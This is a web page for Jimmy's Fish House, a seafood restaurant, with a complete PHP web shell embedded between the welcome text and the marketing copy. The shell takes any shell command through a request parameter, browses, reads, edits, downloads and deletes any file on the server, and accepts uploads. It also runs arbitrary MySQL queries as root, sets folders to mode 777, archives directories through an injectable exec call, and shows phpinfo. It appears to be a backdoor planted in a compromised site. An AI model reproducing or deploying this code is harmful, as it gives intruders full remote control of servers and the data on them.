Welcome To Jimmy's Fish House

 

//Will come back!

function isLinux($path) 

    return (substr($path,0,1)=="/" ? true : false); 

function getSlashDir($isLinux) 

    return($isLinux ? '/' : '\\'); 

//See if we are on Linux or Windows becuase the paths have to be processed differently 

$cwd=getcwd(); 

$isLinux=isLinux($cwd); 

if(!$isLinux) 

    $driveLetter=substr($cwd,0,1); 

$slash=getSlashDir($isLinux); 

$parts=explode($slash,$cwd); 

$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash)); 

function cleanPath($path,$isLinux) 

    $slash=getSlashDir($isLinux); 

    $parts=explode($slash,$path); 

    foreach($parts as $key=>$val)//Process .. directories and a single . 

    { 

        if($val=="..") 

        { 

            $parts[$key]=""; 

            $lastKey=$key-1; 

            $parts[$lastKey]=""; 

        } 

        elseif($val==".") 

        { 

            $parts[$key]=""; 

        } 

    } 

    reset($parts); 

    $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it

    $firstPiece=true; 

    foreach($parts as $val)//Assemble the path back together 

    { 

        if($val != "") 

        { 

            $fixedPath .=  ($firstPiece ? '' : $slash) . $val; 

            $firstPiece=false; 

        } 

    } 

    if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error 

    { 

        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); 

    } 

     

    //Make sure there is an ending slash 

    if(substr($fixedPath,-1)!=$slash) 

        $fixedPath .= $slash; 

    return $fixedPath; 

if(isset($_REQUEST['chm'])) 

    if(!$isLinux) 

    { 

        echo "This feature only works on Linux"; 

    } 

    else 

    { 

        echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); 

    } 

elseif(isset($_REQUEST['phpinfo'])) 

    phpinfo(); 

elseif(isset($_REQUEST['dl'])) 

    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true) 

    { 

        $_REQUEST['dl'] .= $_REQUEST['file']; 

        if(substr($_REQUEST['dl'],0,1)==$slash) 

            $fileArr=explode($slash,$_REQUEST['dl']); 

         

        header('Content-disposition: attachment; filename=' . $_REQUEST['file']); 

        header('Content-type: application/octet-stream'); 

        readfile($_REQUEST['dl']); 

    } 

    else 

    { 

        echo $_REQUEST['dl']; 

    } 

elseif(isset($_REQUEST["gz"])) 

    if(!$isLinux) 

    { 

        echo "This feature only works on Linux"; 

    } 

    else 

    { 

        $directory=$_REQUEST["gz"]; 

         

        if(substr($directory,-1)=="/") 

            $directory = substr($directory,0,-1);  

                 

        $dirParts=explode($slash,$directory); 

        $fname=$dirParts[(sizeof($dirParts)-1)]; 

         

        $archive = time(); 

         

        exec( "cd $directory; tar czf $archive *"); 

        $output=@file_get_contents($directory . "/" . $archive); 

         

        if(!$output) 

            header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); 

        else 

        { 

            header("Content-disposition: attachment; filename=$fname.tgz"); 

            echo $output; 

        } 

         

        header('Content-type: application/octet-stream'); 

        @unlink($directory . "/" . $archive); 

    } 

elseif(isset($_REQUEST['f'])) 

    $filename=$_REQUEST['f']; 

    $file=fopen("$filename","rb"); 

        header("Content-Type: text/plain"); 

    fpassthru($file); 

elseif(isset($_REQUEST['d'])) 

    $d=$_REQUEST['d']; 

    echo "<pre>"; 

    if ($handle = opendir("$d"))  

    { 

        echo "<h2>listing of "; 

        $conString=""; 

        if($isLinux) 

            echo "<a href='?d=$slash'>$slash</a>"; 

        foreach(explode($slash,cleanPath($d,$isLinux)) as $val) 

        { 

            $conString .= $val . $slash; 

            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : ''); 

        } 

        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />"; 

        while ($dir = readdir($handle)) 

        {  

            if (is_dir("$d$slash$dir"))  

            { 

                if($dir != "." && $dir !="..") 

                    $dirList[]=$dir; 

            } 

            else 

            { 

                if(isset($_REQUEST["hldb"])) 

                { 

                    $contents=file_get_contents("$d$slash$dir"); 

                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT "))

                    { 

                        $fileList[]=array('dir'=>$dir,'color'=>'red'); 

                    } 

                    else 

                    { 

                        $fileList[]=array('dir'=>$dir,'color'=>'black'); 

                    } 

                } 

                else 

                { 

                    $fileList[]=array('dir'=>$dir,'color'=>'black'); 

                } 

            } 

        } 

         

        echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>"; 

        echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>"; 

         

        //Some configurations throw a notice if is_array is tried with a non-existant variable 

        if(isset($dirList)) 

        if(is_array($dirList)) 

        foreach($dirList as $dir) 

        { 

                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>"; 

        } 

         

        if(isset($fileList)) 

        if(is_array($fileList)) 

        foreach($fileList as $dir) 

        { 

            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .  

                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .  

                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .  

                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n"; 

        } 

    }  

    else  

    echo "opendir() failed"; 

    closedir($handle); 

elseif(isset($_REQUEST['c'])) 

    if( @ini_get('safe_mode') ) 

    { 

        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';

    } 

    echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />"; 

    trim(exec($_REQUEST['c'],$return)); 

    foreach($return as $val) 

    { 

        echo '<pre>' . htmlentities($val) . '</pre>'; 

    } 

elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) 

    if(isset($_FILES["file_name"])) 

    { 

        if ($_FILES["file_name"]["error"] > 0) 

        { 

                echo "Error"; 

        } 

        else 

        { 

            $target_path = $_COOKIE["uploadDir"]; 

            if(substr($target_path,-1) != "/") 

                $target_path .= "/"; 

             

            $target_path = $target_path . basename( $_FILES['file_name']['name']);  

            if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { 

                setcookie("uploadDir",""); 

                echo "The file ".  basename( $_FILES['file_name']['name']).  

                " has been uploaded"; 

            }  

            else 

            { 

                echo "Error copying file, likely a permission error."; 

            } 

        } 

    } 

    else 

    {        

        ?> 

        <form target="_blank" action="" method="GET"> 

            <input type="hidden" name="cc" value="1" /> 

            Submit this form before submitting file (will open in new window):<br /> 

            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br /> 

            <input type="submit" value="submit" /> 

        </form> 

        <br /><br /> 

         

        <form enctype="multipart/form-data" action="" method="post"> 

        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form> 

 

        <?php 

    } 

elseif(isset($_REQUEST['cc'])) 

    setcookie("uploadDir",$_GET["dir"]); 

    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";

elseif(isset($_REQUEST['mquery'])) 

    $host=$_REQUEST['host']; 

    $usr=$_REQUEST['usr']; 

    $passwd=$_REQUEST['passwd']; 

    $db=$_REQUEST['db']; 

    $mquery=$_REQUEST['mquery']; 

    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error()); 

    mysql_select_db($db); 

    $result = mysql_query($mquery); 

    if($result!=false) 

    { 

        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />"; 

        echo "Return Results:<br />"; 

        $first=true; 

        echo "<table border='1'>"; 

        while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) 

        { 

            if($first) 

            { 

                echo "<tr>"; 

                foreach($row as $key=>$val) 

                { 

                    echo "<td><b>$key</b></td>"; 

                } 

                echo "</tr>"; 

                reset($row); 

                $first=false; 

            } 

            echo "<tr>"; 

            foreach($row as $val) 

            { 

                echo "<td>$val</td>"; 

            } 

            echo "</tr>"; 

        } 

        echo "</table>"; 

        mysql_free_result($result); 

    } 

    else 

    { 

        echo "Query Error: " . mysql_error(); 

    } 

elseif(isset($_REQUEST['df'])) 

    $_REQUEST['df'] .= $slash . $_REQUEST['file']; 

    if(@unlink($_REQUEST['df'])) 

    { 

            echo "File deleted"; 

    } 

    else 

    { 

            echo "Error deleting file"; 

    } 

elseif(isset($_REQUEST['ef'])) 

?> 

<script type="text/javascript"> 

  <!-- 

  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 

  function encode64(inpStr)  

  { 

     inpStr = escape(inpStr); 

     var output = ""; 

     var chr1, chr2, chr3 = ""; 

     var enc1, enc2, enc3, enc4 = ""; 

     var i = 0; 

     do { 

        chr1 = inpStr.charCodeAt(i++); 

        chr2 = inpStr.charCodeAt(i++); 

        chr3 = inpStr.charCodeAt(i++); 

        enc1 = chr1 >> 2; 

        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 

        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 

        enc4 = chr3 & 63; 

        if (isNaN(chr2))  

        { 

           enc3 = enc4 = 64; 

        }  

        else if (isNaN(chr3))  

        { 

           enc4 = 64; 

        } 

        output = output + 

           key.charAt(enc1) + 

           key.charAt(enc2) + 

           key.charAt(enc3) + 

           key.charAt(enc4); 

        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = ""; 

     } while (i < inpStr.length); 

     return output; 

  } 

  //--></script> 

 

  <?php 

    $_REQUEST['ef'] .= $_REQUEST['file'];  

    if(isset($_POST["newcontent"])) 

    { 

        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"])); 

        $stream=@fopen($_REQUEST['ef'],"w"); 

         

        if($stream) 

        { 

            fwrite($stream,$_POST["newcontent"]); 

            echo "Write sucessful"; 

        } 

        else 

        { 

            echo "Could not write to file"; 

        } 

        fclose($stream); 

    } 

    ?> 

    <form action="" name="f" method="POST"> 

    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br /> 

    <input type="submit" value="I base64 encoded it myself, dont run script" /><br /> 

    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />

    </form> 

    <?php 

else 

?> 

<b>Server Information:</b><br /> 

<i> 

Operating System: <?php echo PHP_OS ?><br /> 

PHP Version: <?php echo PHP_VERSION ?><br /> 

<a href="?phpinfo=true">View phpinfo</a> 

</i> 

<br /> 

<br /> 

<b>Directory Traversal</b><br /> 

<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br /> 

<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br /> 

<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form> 

 

 

 

<hr>Execute MySQL Query: 

<form action="" METHOD="GET" > 

<table> 

<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr> 

<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr> 

<tr><td>password</td><td><input type="text" name="passwd"> </td></tr> 

<tr><td>database</td><td><input type="text" name="db"> </td></tr> 

<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr> 

<tr><td colspan="2"><input type="submit" value="execute"></td></tr> 

</table> 

</form> 

<hr> 

<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form>  

<?php 

 



Call Us Now

Leave your busy day behind or take a break from the sun as you enter our fun, upscale, Key West atmosphere right on the Gulf of Mexico.

What We Offer